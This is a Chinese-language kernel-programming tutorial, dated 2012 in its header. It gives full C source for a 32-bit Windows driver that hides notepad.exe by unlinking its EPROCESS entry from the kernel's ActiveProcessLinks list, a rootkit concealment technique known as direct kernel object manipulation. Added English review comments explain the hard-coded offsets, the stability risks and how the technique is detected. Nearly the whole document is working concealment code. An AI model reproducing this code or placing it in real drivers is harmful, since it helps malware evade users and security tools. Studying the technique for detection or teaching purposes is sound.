進程隱藏之內核實現
1、在內核模式下,系統爲每個進程維護了一個EPROCESS結構體,系統所有的進程是通過EPROCESS結構體中的一個ActiveProcessLinks指向的雙端鏈表連接起來的,通過winDBG內核調試工具就可以發現並獲取其相對於EPROCESS結構體的地址(0x88),這樣我們可以通過遍歷該循環鏈表找到我們的目的進程將其鏈表的節點刪除即可隱藏該進程。(EPROCESS中進程PID相對地址爲0x84,進程名字相對地址爲0x174)。
代碼如下:
/****************************
在內核模式下隱藏進程
sky_2012.12.13
****************************/
#include <NTDDK.h>
// NTDDK.h does not define DWORD; alias it to ULONG. The code below stores
// kernel pointers in DWORD, so it only works on a 32-bit kernel.
#define DWORD ULONG
void DriverUnload(IN PDRIVER_OBJECT Driver_Object);
NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
IN PIRP pIrp);
// Walk the ActiveProcessLinks list for a process whose image name equals
// *PsName (the original comment said "by PID", but the code compares names).
// On a match sets *flg = 1 and returns the Blink of the matching process's
// ActiveProcessLinks entry (a PLIST_ENTRY cast to DWORD). When nothing
// matches it returns 0 and leaves *flg untouched.
DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg);
// Name to search for; filled in by DriverEntry.
ANSI_STRING Process_Name;
/*
 * DriverEntry: registers the create/close dispatch routine and the unload
 * routine, then unlinks the EPROCESS of "notepad.exe" from the kernel's
 * ActiveProcessLinks list (direct kernel-object manipulation). RegisterPath
 * is unused. Always returns STATUS_SUCCESS, whether or not the target exists.
 *
 * NOTE(review): the EPROCESS field offsets used here (0x84, 0x88, 0x174) are
 * hard-coded for one specific kernel build; on any other build the reads
 * and writes land on unrelated kernel memory. The list is modified with
 * no synchronisation against the kernel's own list operations, and the
 * target's own Flink/Blink are left pointing into the list, so this is a
 * system-stability risk as well as a concealment technique. Only the list
 * link is removed: the process keeps running, so any enumeration that does
 * not rely on this list can still observe it, which is the basis of the
 * usual cross-view detection of this technique.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver_Object,
IN PUNICODE_STRING RegisterPath)
{
PLIST_ENTRY pre_ActiveProcessLink;
int flg = 0;
// Holds the PLIST_ENTRY that precedes the target entry (0 if not found).
DWORD preprocess = 0x00000000;
CHAR *string1 = "notepad.exe";
Driver_Object->MajorFunction[IRP_MJ_CREATE] = HelloDDKDispatchRoutine;
Driver_Object->MajorFunction[IRP_MJ_CLOSE] = HelloDDKDispatchRoutine;
Driver_Object->DriverUnload = DriverUnload;
// Locate the list entry before the target's ActiveProcessLinks. Despite the
// original comment, this is a pointer to a LIST_ENTRY (the Blink of the
// target's entry), not to the previous process's EPROCESS base.
RtlInitAnsiString(&Process_Name,string1);
preprocess = FindProcessEPROCESS(&Process_Name,&flg);
// flg is only set on a match, so preprocess is non-zero when flg is set.
if(flg)
{
pre_ActiveProcessLink = (PLIST_ENTRY)(preprocess);
// Unlink: the previous entry's Flink skips over the target, and the new
// successor's Blink is pointed back at the previous entry. The target's
// own Flink/Blink are not touched.
pre_ActiveProcessLink->Flink = pre_ActiveProcessLink->Flink->Flink;
pre_ActiveProcessLink->Flink->Blink = pre_ActiveProcessLink;
KdPrint(("Delete Success!\n"));
}
else
{
KdPrint(("notepad.exe dos'nt exist!\n"));
}
return STATUS_SUCCESS;
}
/*
 * FindProcessEPROCESS: starting from the current process, walks the
 * ActiveProcessLinks ring comparing each process's image name (read at
 * EPROCESS + 0x174) with *PsName. The walk stops when the PID read at
 * EPROCESS + 0x84 equals the PID of the starting process again.
 *
 * PsName: image name to match (compared case-sensitively).
 * flg:    set to 1 on a match; not written otherwise.
 * Returns the Blink of the matching entry's ActiveProcessLinks as a DWORD,
 * or 0 when the ring has been walked without a match.
 *
 * NOTE(review): every offset here is build-specific; see DriverEntry. The
 * name comparison assumes the name field is NUL-terminated — TODO confirm.
 * If the ring contains an entry that is not inside an EPROCESS (a list head),
 * the negative-offset reads on it presumably read unrelated memory; the code
 * has no check for that.
 */
DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg)
{
ANSI_STRING CurName;
PLIST_ENTRY cut_ActiveProcessLink = 0x00000000;
DWORD CUR_EPROCESS = 0x00000000;
DWORD curent_id = 0;// PID of the entry being examined
DWORD start_id =0;  // PID of the process the walk started from
int count = 0;// number of entries visited in the loop
// Begin with the process DriverEntry is executing in.
CUR_EPROCESS = (DWORD)PsGetCurrentProcess();
curent_id = *((DWORD*)(CUR_EPROCESS + 0x84));
start_id = curent_id;
RtlInitAnsiString(&CurName,(char*)CUR_EPROCESS + 0x174);
cut_ActiveProcessLink = (PLIST_ENTRY)(CUR_EPROCESS + 0x88);
// RtlCompareString returns 0 on equality; FALSE = case-sensitive.
if(!RtlCompareString(PsName, &CurName,FALSE))
{
*flg = 1;
return ((DWORD)(cut_ActiveProcessLink->Blink));
}
// Walk forward through the ring. The only exits are the two returns below.
while(1)
{
count++;
cut_ActiveProcessLink = cut_ActiveProcessLink->Flink;
// Recover the EPROCESS base from the LIST_ENTRY (-0x88), then read the
// name (+0x174) and PID (+0x84) fields.
RtlInitAnsiString(&CurName,(char*)cut_ActiveProcessLink - 0x88 + 0x174);
curent_id = *((DWORD*)((DWORD)cut_ActiveProcessLink - 0x88 + 0x84));
if(!RtlCompareString(PsName,&CurName,FALSE))
{
*flg = 1;
return ((DWORD)(cut_ActiveProcessLink->Blink));
}
// Back at the starting PID: full ring walked. count>=1 always holds here
// because count++ runs first in each iteration, so it is effectively redundant.
else if (count>=1&&(start_id == curent_id))
{
// The debug string reads "not found".
KdPrint(("沒有找到!\n"));
return 0x00000000;
}
}
}
//默認的例程
// Default dispatch routine for IRP_MJ_CREATE and IRP_MJ_CLOSE: logs entry
// and exit, completes the IRP with STATUS_SUCCESS and returns that status.
// pDevObj is not used. IoStatus.Information is left as the caller set it.
NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
IN PIRP pIrp)
{
KdPrint(("Enter HelloDDKDispatchRoutine\n"));
// Complete the request with success and no priority boost.
pIrp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(pIrp, IO_NO_INCREMENT );
KdPrint(("Leave HelloDDKDispatchRoutine\n"));
return STATUS_SUCCESS;
}
//設置卸載例程
// Unload routine: only logs. Nothing that DriverEntry changed is undone
// here, so the list modification made at load time remains after unload.
void DriverUnload(IN PDRIVER_OBJECT Driver_Object)
{
(void)Driver_Object;
KdPrint(("DriverUnload!\n"));
}